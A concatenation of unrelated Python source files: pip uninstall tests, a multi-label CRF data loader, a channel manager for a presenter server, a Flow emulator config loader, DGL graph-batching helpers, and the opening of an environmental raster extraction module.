@pytest.mark.parametrize("console_scripts",
["test_ = distutils_install",
"test_:test_ = distutils_install"])
def test_uninstall_entry_point_colon_in_name(script, console_scripts):
"""
Test uninstall package with two or more entry points in the same section,
whose name contain a colon.
"""
pkg_name = 'ep_install'
pkg_path = create_test_package_with_setup(
script,
name=pkg_name,
version='0.1',
entry_points={"console_scripts": [console_scripts, ],
"pip_test.ep":
["ep:name1 = distutils_install",
"ep:name2 = distutils_install"]
}
)
script_name = script.bin_path.joinpath(
console_scripts.split('=')[0].strip()
)
if sys.platform == 'win32':
script_name += '.exe'
result = script.pip('install', pkg_path)
assert script_name.exists()
result = script.pip('list', '--format=json')
assert {"name": "ep-install", "version": "0.1"} \
in json.loads(result.stdout)
script.pip('uninstall', 'ep_install', '-y')
assert not script_name.exists()
result2 = script.pip('list', '--format=json')
assert {"name": "ep-install", "version": "0.1"} \
not in json.loads(result2.stdout)
def test_uninstall_gui_scripts(script):
"""
Make sure that uninstall removes gui scripts
"""
pkg_name = "gui_pkg"
pkg_path = create_test_package_with_setup(
script,
name=pkg_name,
version='0.1',
entry_points={"gui_scripts": ["test_ = distutils_install", ], }
)
script_name = script.bin_path.joinpath('test_')
if sys.platform == 'win32':
script_name += '.exe'
script.pip('install', pkg_path)
assert script_name.exists()
script.pip('uninstall', pkg_name, '-y')
assert not script_name.exists()
def test_uninstall_console_scripts(script):
"""
Test uninstalling a package with more files (console_script entry points,
extra directories).
"""
pkg_path = create_test_package_with_setup(
script,
name='discover',
version='0.1',
entry_points={'console_scripts': ['discover = discover:main']},
)
result = script.pip('install', pkg_path)
assert script.bin / 'discover' + script.exe in result.files_created, (
sorted(result.files_created.keys())
)
result2 = script.pip('uninstall', 'discover', '-y')
assert_all_changes(result, result2, [script.venv / 'build', 'cache'])
def test_uninstall_console_scripts_uppercase_name(script):
"""
Test uninstalling console script with uppercase character.
"""
pkg_path = create_test_package_with_setup(
script,
name='ep_install',
version='0.1',
entry_points={
"console_scripts": [
"Test = distutils_install",
],
},
)
script_name = script.bin_path.joinpath('Test' + script.exe)
script.pip('install', pkg_path)
assert script_name.exists()
script.pip('uninstall', 'ep_install', '-y')
assert not script_name.exists()
@pytest.mark.network
def test_uninstall_easy_installed_console_scripts(script):
"""
    Test uninstalling a package with console_scripts that was easy_installed.
"""
# setuptools >= 42.0.0 deprecates easy_install and prints a warning when
# used
result = script.easy_install('discover', allow_stderr_warning=True)
assert script.bin / 'discover' + script.exe in result.files_created, (
sorted(result.files_created.keys())
)
result2 = script.pip('uninstall', 'discover', '-y')
assert_all_changes(
result,
result2,
[
script.venv / 'build',
'cache',
script.site_packages / 'easy-install.pth',
]
)
@pytest.mark.network
@need_svn
def test_uninstall_editable_from_svn(script, tmpdir):
"""
Test uninstalling an editable installation from svn.
"""
result = script.pip(
'install', '-e',
'{checkout}#egg=initools'.format(
checkout=local_checkout(
'svn+http://svn.colorstudy.com/INITools', tmpdir)
),
)
result.assert_installed('INITools')
result2 = script.pip('uninstall', '-y', 'initools')
assert (script.venv / 'src' / 'initools' in result2.files_after)
assert_all_changes(
result,
result2,
[
script.venv / 'src',
script.venv / 'build',
script.site_packages / 'easy-install.pth'
],
)
@pytest.mark.network
def test_uninstall_editable_with_source_outside_venv(script, tmpdir):
"""
Test uninstalling editable install from existing source outside the venv.
"""
try:
temp = mkdtemp()
temp_pkg_dir = join(temp, 'pip-test-package')
_test_uninstall_editable_with_source_outside_venv(
script,
tmpdir,
temp_pkg_dir,
)
finally:
rmtree(temp)
def _test_uninstall_editable_with_source_outside_venv(
script, tmpdir, temp_pkg_dir,
):
result = script.run(
'git', 'clone',
local_repo('git+git://github.com/pypa/pip-test-package', tmpdir),
temp_pkg_dir,
expect_stderr=True,
)
result2 = script.pip('install', '-e', temp_pkg_dir)
assert join(
script.site_packages, 'pip-test-package.egg-link'
) in result2.files_created, list(result2.files_created.keys())
result3 = script.pip('uninstall', '-y', 'pip-test-package')
assert_all_changes(
result,
result3,
[script.venv / 'build', script.site_packages / 'easy-install.pth'],
)
@pytest.mark.network
@need_svn
def test_uninstall_from_reqs_file(script, tmpdir):
"""
Test uninstall from a requirements file.
"""
local_svn_url = local_checkout(
'svn+http://svn.colorstudy.com/INITools', tmpdir,
)
script.scratch_path.joinpath("test-req.txt").write_text(
textwrap.dedent("""
-e {url}#egg=initools
# and something else to test out:
PyLogo<0.4
""").format(url=local_svn_url)
)
result = script.pip('install', '-r', 'test-req.txt')
script.scratch_path.joinpath("test-req.txt").write_text(
textwrap.dedent("""
# -f, -i, and --extra-index-url should all be ignored by uninstall
-f http://www.example.com
-i http://www.example.com
--extra-index-url http://www.example.com
-e {url}#egg=initools
# and something else to test out:
PyLogo<0.4
""").format(url=local_svn_url)
)
result2 = script.pip('uninstall', '-r', 'test-req.txt', '-y')
assert_all_changes(
result,
result2,
[
script.venv / 'build',
script.venv / 'src',
script.scratch / 'test-req.txt',
script.site_packages / 'easy-install.pth',
],
)
def test_uninstallpathset_no_paths(caplog):
"""
Test UninstallPathSet logs notification when there are no paths to
uninstall
"""
from pip._internal.req.req_uninstall import UninstallPathSet
from pkg_resources import get_distribution
caplog.set_level(logging.INFO)
test_dist = get_distribution('pip')
uninstall_set = UninstallPathSet(test_dist)
uninstall_set.remove() # with no files added to set
assert (
"Can't uninstall 'pip'. No files were found to uninstall."
in caplog.text
)
def test_uninstall_non_local_distutils(caplog, monkeypatch, tmpdir):
einfo = tmpdir.joinpath("thing-1.0.egg-info")
with open(einfo, "wb"):
pass
dist = pretend.stub(
key="thing",
project_name="thing",
egg_info=einfo,
location=einfo,
_provider=pretend.stub(),
)
get_dist = pretend.call_recorder(lambda x: dist)
monkeypatch.setattr("pip._vendor.pkg_resources.get_distribution", get_dist)
req = install_req_from_line("thing")
req.uninstall()
assert os.path.exists(einfo)
def test_uninstall_wheel(script, data):
"""
Test uninstalling a wheel
"""
package = data.packages.joinpath("simple.dist-0.1-py2.py3-none-any.whl")
result = script.pip('install', package, '--no-index')
dist_info_folder = script.site_packages / 'simple.dist-0.1.dist-info'
assert dist_info_folder in result.files_created
result2 = script.pip('uninstall', 'simple.dist', '-y')
assert_all_changes(result, result2, [])
@pytest.mark.skipif("sys.platform == 'win32'")
def test_uninstall_with_symlink(script, data, tmpdir):
"""
Test uninstalling a wheel, with an additional symlink
https://github.com/pypa/pip/issues/6892
"""
package = data.packages.joinpath("simple.dist-0.1-py2.py3-none-any.whl")
script.pip('install', package, '--no-index')
symlink_target = tmpdir / "target"
symlink_target.mkdir()
symlink_source = script.site_packages / "symlink"
(script.base_path / symlink_source).symlink_to(symlink_target)
st_mode = symlink_target.stat().st_mode
distinfo_path = script.site_packages_path / 'simple.dist-0.1.dist-info'
record_path = distinfo_path / 'RECORD'
with open(record_path, "a") as f:
f.write("symlink,,\n")
uninstall_result = script.pip('uninstall', 'simple.dist', '-y')
assert symlink_source in uninstall_result.files_deleted
assert symlink_target.stat().st_mode == st_mode
def test_uninstall_setuptools_develop_install(script, data):
"""Try uninstall after setup.py develop followed of setup.py install"""
pkg_path = data.packages.joinpath("FSPkg")
script.run('python', 'setup.py', 'develop',
expect_stderr=True, cwd=pkg_path)
script.run('python', 'setup.py', 'install',
expect_stderr=True, cwd=pkg_path)
list_result = script.pip('list', '--format=json')
assert {"name": os.path.normcase("FSPkg"), "version": "0.1.dev0"} \
in json.loads(list_result.stdout), str(list_result)
# Uninstall both develop and install
uninstall = script.pip('uninstall', 'FSPkg', '-y')
assert any(filename.endswith('.egg')
for filename in uninstall.files_deleted.keys())
uninstall2 = script.pip('uninstall', 'FSPkg', '-y')
assert join(
script.site_packages, 'FSPkg.egg-link'
) in uninstall2.files_deleted, list(uninstall2.files_deleted.keys())
list_result2 = script.pip('list', '--format=json')
assert "FSPkg" not in {p["name"] for p in json.loads(list_result2.stdout)}
def test_uninstall_editable_and_pip_install(script, data):
"""Try uninstall after pip install -e after pip install"""
# SETUPTOOLS_SYS_PATH_TECHNIQUE=raw removes the assumption that `-e`
# installs are always higher priority than regular installs.
# This becomes the default behavior in setuptools 25.
script.environ['SETUPTOOLS_SYS_PATH_TECHNIQUE'] = 'raw'
pkg_path = data.packages.joinpath("FSPkg")
script.pip('install', '-e', '.',
expect_stderr=True, cwd=pkg_path)
# ensure both are installed with --ignore-installed:
script.pip('install', '--ignore-installed', '.',
expect_stderr=True, cwd=pkg_path)
list_result = script.pip('list', '--format=json')
assert {"name": "FSPkg", "version": "0.1.dev0"} \
in json.loads(list_result.stdout)
# Uninstall both develop and install
uninstall = script.pip('uninstall', 'FSPkg', '-y')
assert not any(filename.endswith('.egg-link')
for filename in uninstall.files_deleted.keys())
uninstall2 = script.pip('uninstall', 'FSPkg', '-y')
assert join(
script.site_packages, 'FSPkg.egg-link'
) in uninstall2.files_deleted, list(uninstall2.files_deleted.keys())
list_result2 = script.pip('list', '--format=json')
assert "FSPkg" not in {p["name"] for p in json.loads(list_result2.stdout)}
def test_uninstall_ignores_missing_packages(script, data):
"""Uninstall of a non existent package prints a warning and exits cleanly
"""
result = script.pip(
'uninstall', '-y', 'non-existent-pkg', expect_stderr=True,
)
assert "Skipping non-existent-pkg as it is not installed." in result.stderr
assert result.returncode == 0, "Expected clean exit"
def test_uninstall_ignores_missing_packages_and_uninstalls_rest(script, data):
script.pip_install_local('simple')
result = script.pip(
'uninstall', '-y', 'non-existent-pkg', 'simple', expect_stderr=True,
)
assert "Skipping non-existent-pkg as it is not installed." in result.stderr
assert "Successfully uninstalled simple" in result.stdout
assert result.returncode == 0, "Expected clean exit"
|
the-stack_106_23818 | import numpy as np
import torch
import torch.utils.data as Data
from sklearn.decomposition import PCA
from scipy.special import comb  # "n choose k" combination formula from combinatorics
def f_k(dataSet, Labels, d, q):
"""
    :param dataSet: feature vector of a single sample
    :param Labels: label vector of a single sample
    :param d: dimensionality of the sample, i.e. the number of features
    :param q: dimensionality of the label set, i.e. the number of labels
    :return: the feature function value f_k(x, y)
"""
F_k = []
for l in range(d):
for j in range(q):
if Labels[j] == 1:
try:
F_k.append(float(dataSet[l]))
except:
# print(dataSet)
# print(l, dataSet)
raise IndexError
else:
F_k.append(0.0)
for j1 in range(q - 1):
for j2 in range(j1 + 1, q):
y_j1 = Labels[j1]
y_j2 = Labels[j2]
if y_j1 == 1 and y_j2 == 1:
F_k.append(1.0)
else:
F_k.append(0.0)
if y_j1 == 1 and y_j2 == 0:
F_k.append(1.0)
else:
F_k.append(0.0)
if y_j1 == 0 and y_j2 == 1:
F_k.append(1.0)
else:
F_k.append(0.0)
if y_j1 == 0 and y_j2 == 0:
F_k.append(1.0)
else:
F_k.append(0.0)
# print(len(F_k))
return torch.tensor(F_k, requires_grad=True)
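# Illustrative sketch (added for clarity, not part of the original code): for d features and
# q labels, f_k returns a vector of length d*q + 4*C(q, 2), which matches the K computed in
# load_data further below. The sample values here are made up.
def _example_feature_dimension():
    sample = torch.tensor([0.5, 1.0, 2.0])  # d = 3 features
    labels = [1, 0, 1]                      # q = 3 labels
    fk = f_k(sample, labels, 3, 3)
    assert fk.shape[0] == 3 * 3 + 4 * comb(3, 2)  # 9 + 12 = 21
    return fk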
def basic_rand_labels(len):
"""
    Turned into a helper function.
    # The number of nested for-loops over the label set Y equals the number of labels (y1, y2, ..., yq).
    :return: all combinations of the q-dimensional label set
"""
"""
randLabels=[]
for i in range(2):
randLabels.append([i])
return randLabels
"""
randLabels = []
for i in range(2 ** len):
randLabel = np.zeros(shape=len)
for j in range(len):
randLabel[len - j - 1] = i % 2
i = i // 2
if i == 0:
break
print(randLabel)
randLabels.append(randLabel)
np.save("./basic_rand_Labels.npy", np.array(randLabels))
def supported_rand_labels(train_label):
"""
    Helper function used to generate supported_rand_labels (the label vectors observed in the training data).
"""
"""
randLabels=[]
for i in range(2):
randLabels.append([i])
return randLabels
"""
# for _, y in train_iter:
labels = train_label.tolist()
label_set = []
for label in labels:
if label in label_set:
continue
else:
label_set.append(label)
randLables = np.array(label_set)
print(label_set)
np.save("./supported_rand_labels.npy", randLables)
print("finish")
def generate_rand_Labels(mode):
if mode == "supported":
randLabels = np.load("./data/rand_labels/supported_rand_labels.npy")
randLabels = randLabels.tolist()
return randLabels
elif mode == "basic":
randLabels = np.load("./data/rand_labels/basic_rand_Labels.npy")
randLabels = randLabels.tolist()
return randLabels
def Z(dataSet, d, q, Lambda, randLabels):  # normalization term Z for a single sample
    """
    :param dataSet: feature vector of a single sample
    :param d: dimensionality of the sample, i.e. the number of features
    :param q: number of labels in the label set
    :param Lambda: a 1*K-dimensional weight vector
    :param randLabels: list of candidate label vectors to sum over
    :return: the normalization constant Z(x) over all label combinations in randLabels
"""
Z = 0
for i in range(len(randLabels)):
fk = f_k(dataSet, randLabels[i], d, q)
temp_sum = torch.exp((Lambda * fk).sum())
Z = Z + temp_sum
return Z
def load_data(train_data_path, train_label_path, test_data_path, test_label_path, batch_size):
    # process the training set
train_data = np.load(train_data_path)
train_data = train_data[:, :]
train_label = np.load(train_label_path)
train_label = train_label[:, :]
test_data = np.load(test_data_path)
test_data = test_data[:, :]
test_label = np.load(test_label_path)
test_target = test_label[:, :]
train_target = torch.tensor(train_label, dtype=torch.float, requires_grad=True)
test_target = torch.tensor(test_label, dtype=torch.float, requires_grad=True)
    # dimensionality reduction with PCA
    pca = PCA(n_components=5)  # keep 5 principal components
train_data = torch.tensor(pca.fit_transform(train_data), requires_grad=True)
test_data = torch.tensor((pca.fit_transform(test_data)), requires_grad=True)
d = len(train_data[0])
q = len(train_target[0])
K = int(d * q + 4 * comb(q, 2))
    thegma = 2 ** (1)  # hyper-parameter search over exponents -6, -5, -4, -3, -2, -1, 0, 1, 2, 3, 4, 5, 6
    # training dataset
dataset = Data.TensorDataset(train_data, train_target)
    # process the test set
test_data = Data.TensorDataset(test_data, test_target)
# test_data = Data.TensorDataset(torch.tensor(test_data, requires_grad=True))
    # read mini-batches in random order (only the training set is shuffled)
train_iter = Data.DataLoader(dataset, batch_size, shuffle=True)
test_iter = Data.DataLoader(test_data, batch_size, shuffle=False)
return train_iter, test_iter, K, thegma, d, q
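# Hedged usage sketch (not from the original project): creates tiny synthetic .npy files so
# that load_data can be exercised end to end; every file name and size below is made up.
if __name__ == "__main__":
    import os
    import tempfile
    tmp_dir = tempfile.mkdtemp()
    paths = {name: os.path.join(tmp_dir, name + ".npy")
             for name in ("train_x", "train_y", "test_x", "test_y")}
    np.save(paths["train_x"], np.random.rand(20, 8))
    np.save(paths["train_y"], np.random.randint(0, 2, size=(20, 3)))
    np.save(paths["test_x"], np.random.rand(10, 8))
    np.save(paths["test_y"], np.random.randint(0, 2, size=(10, 3)))
    train_iter, test_iter, K, thegma, d, q = load_data(
        paths["train_x"], paths["train_y"], paths["test_x"], paths["test_y"], batch_size=4)
    print("d =", d, "q =", q, "K =", K)  # expects d = 5 (after PCA), q = 3, K = 27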
|
the-stack_106_23820 | # =======================================================================
#
# Copyright (C) 2018, Hisilicon Technologies Co., Ltd. All Rights Reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1 Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2 Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3 Neither the names of the copyright holders nor the names of the
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# =======================================================================
#
"""presenter channel manager module"""
import logging
import threading
# max support 10 channels
MAX_CHANNEL_NUM = 10
# when a channel have receive data,
# the active status will last 3 seconds
ACTIVE_LAST_TIME = 3
class ChannelResource():
"""every channel has a ChannelResource object, contains a ChannelHandler object
and a socket fileno. it corresponding to the ChannelFd one by one
"""
def __init__(self, handler, socket=None):
self.handler = handler
self.socket = socket
class ChannelFd():
"""every channel has a ChannelFd object, contains a ChannelHandler
object and channel name. It corresponds to the ChannelResource one by one
"""
def __init__(self, channel_name, handler):
self.channel_name = channel_name
self.handler = handler
class Channel():
"""record user register channels
self.image: if channel type is image, save the image here
"""
def __init__(self, channel_name):
self.channel_name = channel_name
self.image = None
self.rectangle_list = None
class ChannelManager():
"""manage all the api about channel
__instance: ensure it is a single instance
_channel_resources: a dict
key: channel name
value: a ChannelResource() object.
_channel_fds: a dict
key: socket fileno
value: a ChannelFd() object.
_channel_list: a list, member is a Channel() object."""
__instance = None
channel_resources = {}
channel_fds = {}
channel_list = []
channel_resource_lock = threading.Lock()
channel_fds_lock = threading.Lock()
channel_lock = threading.Lock()
err_code_ok = 0
err_code_too_many_channel = 1
err_code_repeat_channel = 2
def __init__(self, channel_list=None):
"""init func"""
def __new__(cls, channel_list=None):
"""ensure only a single instance created. """
if cls.__instance is None:
cls.__instance = object.__new__(cls)
# default create 2 channels: image and video
# if channel_list is not None and isinstance(channel_list, list):
# for i in channel_list:
# cls.channel_list.append(Channel(channel_name=i))
# logging.info("register channel %s", i)
return cls.__instance
def _register_channel_fd(self, sock_fileno, channel_name):
"""Internal func, create a ChannelFd object"""
if self.channel_fds.get(sock_fileno):
del self.channel_fds[sock_fileno]
handler = self.channel_resources[channel_name].handler
self.channel_fds[sock_fileno] = ChannelFd(channel_name, handler)
def create_channel_resource(self, channel_name,
channel_fd,
media_type,
handler):
"""create a ChannelResource object which contains all the resources
binding a channel.
channel_name: channel name.
channel_fd: socket fileno binding the channel.
media_type: support image or video.
handler: an channel handler process image data.
"""
with self.channel_resource_lock:
log_info = "create channel resource,"
log_info += " channel_name:%s, channel_fd:%u, media_type:%s"
logging.info(log_info, channel_name, channel_fd, media_type)
self.channel_resources[channel_name] = \
ChannelResource(handler=handler, socket=channel_fd)
self._register_channel_fd(channel_fd, channel_name)
def _clean_channel_resource(self, channel_name):
"""Internal func, clean channel resource by channel name"""
if self.channel_resources.get(channel_name):
self.channel_resources[channel_name].handler.close_thread()
self.channel_resources[channel_name].handler.web_event.set()
self.channel_resources[channel_name].handler.image_event.set()
del self.channel_resources[channel_name]
logging.info("clean channel: %s's resource", channel_name)
def clean_channel_resource_by_fd(self, sock_fileno):
"""
        clean channel resource by socket fileno
        sock_fileno: socket fileno which is bound to a channel
"""
with self.channel_fds_lock:
with self.channel_resource_lock:
if self.channel_fds.get(sock_fileno):
self._clean_channel_resource(
self.channel_fds[sock_fileno].channel_name)
del self.channel_fds[sock_fileno]
def clean_channel_resource_by_name(self, channel_name):
"""clean channel resource by channel_name
channel_name: channel name"""
if self.channel_resources.get(channel_name):
self.clean_channel_resource_by_fd(
self.channel_resources[channel_name].socket)
def get_channel_handler_by_fd(self, sock_fileno):
"""get channel handler by socket fileno"""
with self.channel_fds_lock:
if self.channel_fds.get(sock_fileno):
return self.channel_fds[sock_fileno].handler
return None
def is_channel_busy(self, channel_name):
"""check if channel is busy """
with self.channel_resource_lock:
if self.channel_resources.get(channel_name):
return True
return False
def close_all_thread(self):
"""if a channel process video type, it will create a thread.
this func can close the thread.
"""
with self.channel_resource_lock:
for channel_name in self.channel_resources:
self.channel_resources[channel_name].handler.close_thread()
def get_channel_handler_by_name(self, channel_name):
"""
        get the channel handler by channel name
"""
with self.channel_resource_lock:
if self.channel_resources.get(channel_name):
return self.channel_resources[channel_name].handler
return None
def list_channels(self):
"""
        return all channel names and their status
        the status indicates whether the channel is active
"""
with self.channel_lock:
return [{'status': self.is_channel_busy(i.channel_name),
'name': i.channel_name} for i in self.channel_list]
def register_one_channel(self, channel_name):
"""
        register a channel path; the user creates a channel via the browser
"""
with self.channel_lock:
if len(self.channel_list) >= MAX_CHANNEL_NUM:
logging.info("register channel: %s fail, \
exceed max number 10.", channel_name)
return self.err_code_too_many_channel
for i in range(len(self.channel_list)):
if self.channel_list[i].channel_name == channel_name:
logging.info("register channel: %s fail, \
already exist.", channel_name)
return self.err_code_repeat_channel
self.channel_list.append(Channel(channel_name=channel_name))
logging.info("register channel: %s", channel_name)
return self.err_code_ok
def unregister_one_channel(self, channel_name):
"""
        unregister a channel path; the user deletes a channel via the browser
"""
with self.channel_lock:
for i in range(len(self.channel_list)):
if self.channel_list[i].channel_name == channel_name:
self.clean_channel_resource_by_name(channel_name)
logging.info("unregister channel: %s", channel_name)
del self.channel_list[i]
break
def is_channel_exist(self, channel_name):
"""
        Check if a channel exists
True: exist
False: not exist
"""
with self.channel_lock:
for i in range(len(self.channel_list)):
if self.channel_list[i].channel_name == channel_name:
return True
return False
def save_channel_image(self, channel_name, image_data, rectangle_list):
"""
        when a channel is bound to the image type,
        the server permanently holds an image for it.
        this func saves an image in memory
"""
with self.channel_lock:
for i in range(len(self.channel_list)):
if self.channel_list[i].channel_name == channel_name:
self.channel_list[i].image = image_data
self.channel_list[i].rectangle_list = rectangle_list
break
def get_channel_image(self, channel_name):
"""
        when a channel is bound to the image type,
        the server permanently holds an image for it.
        this func gets the image
"""
with self.channel_lock:
for i in range(len(self.channel_list)):
if self.channel_list[i].channel_name == channel_name:
return self.channel_list[i].image
# channel not exist
return None
def get_channel_image_with_rectangle(self, channel_name):
"""
        A newer method for the display server;
        returns the image and rectangle list
"""
with self.channel_lock:
for i in range(len(self.channel_list)):
if self.channel_list[i].channel_name == channel_name:
return (self.channel_list[i].image, self.channel_list[i].rectangle_list)
return (None, None)
def clean_channel_image(self, channel_name):
"""
        when a channel is bound to the image type,
        the server permanently holds an image for it.
        this func cleans the image
"""
with self.channel_lock:
for i in range(len(self.channel_list)):
if self.channel_list[i].channel_name == channel_name:
self.channel_list[i].image = None
break
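# Hedged usage sketch (added for illustration, not part of the original module): ChannelManager
# is a singleton, so every instantiation returns the same object. The channel name is made up.
if __name__ == '__main__':
    manager = ChannelManager()
    assert manager.register_one_channel("demo_channel") == manager.err_code_ok
    print(manager.list_channels())  # -> [{'status': False, 'name': 'demo_channel'}]
    manager.unregister_one_channel("demo_channel")
    assert not manager.is_channel_exist("demo_channel")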
|
the-stack_106_23822 | import json
import logging
from pathlib import Path
from flow_py_sdk.cadence import Address
from flow_py_sdk.signer import InMemorySigner, HashAlgo, SignAlgo
log = logging.getLogger(__name__)
class Config(object):
def __init__(self, config_location: Path) -> None:
super().__init__()
self.access_node_host: str = "localhost"
self.access_node_port: int = 3569
self.service_account_key_id: int = 0
# noinspection PyBroadException
try:
with open(config_location) as json_file:
data = json.load(json_file)
self.service_account_address = Address.from_hex(
data["accounts"]["emulator-account"]["address"]
)
self.service_account_signer = InMemorySigner(
hash_algo=HashAlgo.from_string(
data["accounts"]["emulator-account"]["hashAlgorithm"]
),
sign_algo=SignAlgo.from_string(
data["accounts"]["emulator-account"]["sigAlgorithm"]
),
private_key_hex=data["accounts"]["emulator-account"]["keys"],
)
except Exception:
log.warning(
f"Cannot open {config_location}, using default settings",
exc_info=True,
stack_info=True,
)
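# Hedged usage sketch (not part of the original module): Config expects a Flow CLI project
# file (commonly named flow.json); the path below is an assumption. If the file cannot be
# read, the constructor above falls back to the default emulator settings and logs a warning.
if __name__ == "__main__":
    cfg = Config(Path("./flow.json"))
    print(cfg.access_node_host, cfg.access_node_port)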
|
the-stack_106_23823 | import torch as th
from torch.autograd import Function
def batch2tensor(batch_adj, batch_feat, node_per_pool_graph):
"""
transform a batched graph to batched adjacency tensor and node feature tensor
"""
batch_size = int(batch_adj.size()[0] / node_per_pool_graph)
adj_list = []
feat_list = []
for i in range(batch_size):
start = i * node_per_pool_graph
end = (i + 1) * node_per_pool_graph
adj_list.append(batch_adj[start:end, start:end])
feat_list.append(batch_feat[start:end, :])
adj_list = list(map(lambda x: th.unsqueeze(x, 0), adj_list))
feat_list = list(map(lambda x: th.unsqueeze(x, 0), feat_list))
adj = th.cat(adj_list, dim=0)
feat = th.cat(feat_list, dim=0)
return feat, adj
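# Illustrative sketch (added for clarity, not from the original repo): batch2tensor splits a
# block-diagonal batched adjacency of shape (B*n, B*n) and stacked features of shape (B*n, f)
# into per-graph tensors of shape (B, n, n) and (B, n, f). The sizes below are made up.
def _example_batch2tensor():
    batch_size, n, f = 2, 3, 4
    batch_adj = th.eye(batch_size * n)
    batch_feat = th.rand(batch_size * n, f)
    feat, adj = batch2tensor(batch_adj, batch_feat, node_per_pool_graph=n)
    assert adj.shape == (batch_size, n, n) and feat.shape == (batch_size, n, f)
    return feat, adj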
def masked_softmax(matrix, mask, dim=-1, memory_efficient=True,
mask_fill_value=-1e32):
'''
masked_softmax for dgl batch graph
code snippet contributed by AllenNLP (https://github.com/allenai/allennlp)
'''
if mask is None:
result = th.nn.functional.softmax(matrix, dim=dim)
else:
mask = mask.float()
while mask.dim() < matrix.dim():
mask = mask.unsqueeze(1)
if not memory_efficient:
result = th.nn.functional.softmax(matrix * mask, dim=dim)
result = result * mask
result = result / (result.sum(dim=dim, keepdim=True) + 1e-13)
else:
            masked_matrix = matrix.masked_fill((1 - mask).bool(),
                                               mask_fill_value)
result = th.nn.functional.softmax(masked_matrix, dim=dim)
return result
|
the-stack_106_23824 | """
"
" Author: Maximilien Servajean - mservajean
" Mail: [email protected]
" Date: 04/01/2019
"
" Description: The code to extract environmental tensors and environmental vectors given some environmental rasters.
"
"""
import numpy as np
import rasterio
import re
import warnings
import matplotlib.pyplot as plt
# metadata used to setup some rasters
raster_metadata = {
'bdticm': {'min_val': 0, 'max_val': 112467, 'nan': -2147483647, 'new_nan': -1, 'mu': 2579, 'sigma': 3058},
'bldfie': {'min_val': 93, 'max_val': 1828, 'nan': -32768, 'new_nan': 92, 'mu': 1372, 'sigma': 137},
'cecsol': {'min_val': 0, 'max_val': 385, 'nan': -32768, 'new_nan': -1, 'mu': 20, 'sigma': 8},
'clyppt': {'min_val': 0, 'max_val': 81, 'nan': -32768, 'new_nan': -1, 'mu': 22, 'sigma': 8},
'orcdrc': {'min_val': 0, 'max_val': 524, 'nan': -32768, 'new_nan': -1, 'mu': 24, 'sigma': 21},
'phihox': {'min_val': 32, 'max_val': 98, 'nan': -32768, 'new_nan': 31, 'mu': 64, 'sigma': 11},
'sltppt': {'min_val': 0, 'max_val': 86, 'nan': -32768, 'new_nan': -1, 'mu': 37, 'sigma': 11},
'sndppt': {'min_val': 0, 'max_val': 99, 'nan': -32768, 'new_nan': -1, 'mu': 42, 'sigma': 14},
'bio_1': {'min_val': -116, 'max_val': 259, 'nan': -2147483647, 'new_nan': -117, 'mu': 101, 'sigma': 58},
'bio_2': {'min_val': -53, 'max_val': 361, 'nan': -2147483647, 'new_nan': -54, 'mu': 131, 'sigma': 28},
'bio_3': {'min_val': 19, 'max_val': 69, 'nan': -2147483647, 'new_nan': 18, 'mu': 36, 'sigma': 8},
'bio_4': {'min_val': 1624, 'max_val': 13302, 'nan': -2147483647, 'new_nan': 1623, 'mu': 8267, 'sigma': 2152},
'bio_5': {'min_val': -25, 'max_val': 457, 'nan': -2147483647, 'new_nan': -26, 'mu': 289, 'sigma': 48},
'bio_6': {'min_val': -276, 'max_val': 183, 'nan': -2147483647, 'new_nan': -277, 'mu': -78, 'sigma': 83},
'bio_7': {'min_val': 117, 'max_val': 515, 'nan': -2147483647, 'new_nan': 116, 'mu': 367, 'sigma': 72},
'bio_8': {'min_val': -169, 'max_val': 332, 'nan': -2147483647, 'new_nan': -170, 'mu': 149, 'sigma': 82},
'bio_9': {'min_val': -181, 'max_val': 331, 'nan': -2147483647, 'new_nan': -182, 'mu': 54, 'sigma': 114},
'bio_10': {'min_val': -53, 'max_val': 361, 'nan': -2147483647, 'new_nan': -54, 'mu': 205, 'sigma': 47},
'bio_11': {'min_val': -186, 'max_val': 220, 'nan': -2147483647, 'new_nan': -187, 'mu': -7, 'sigma': 80},
'bio_12': {'min_val': -35, 'max_val': 3385, 'nan': -2147483647, 'new_nan': -36, 'mu': 746, 'sigma': 383},
'bio_13': {'min_val': 7, 'max_val': 570, 'nan': -2147483647, 'new_nan': 6, 'mu': 98, 'sigma': 47},
'bio_14': {'min_val': 0, 'max_val': 184, 'nan': -2147483647, 'new_nan': -1, 'mu': 34, 'sigma': 26},
'bio_15': {'min_val': 5, 'max_val': 140, 'nan': -2147483647, 'new_nan': 4, 'mu': 38, 'sigma': 23},
'bio_16': {'min_val': 19, 'max_val': 1546, 'nan': -2147483647, 'new_nan': 18, 'mu': 265, 'sigma': 132},
'bio_17': {'min_val': 0, 'max_val': 612, 'nan': -2147483647, 'new_nan': -1, 'mu': 117, 'sigma': 84},
'bio_18': {'min_val': 1, 'max_val': 777, 'nan': -2147483647, 'new_nan': 0, 'mu': 213, 'sigma': 107},
'bio_19': {'min_val': 5, 'max_val': 1485, 'nan': -2147483647, 'new_nan': 4, 'mu': 163, 'sigma': 137},
}
class Raster(object):
"""
    Raster handles the management of a single environmental raster.
"""
def __init__(self, path, country='FR', normalized=False, transform=None, size=256, nan=None, new_nan=None, mu=0,
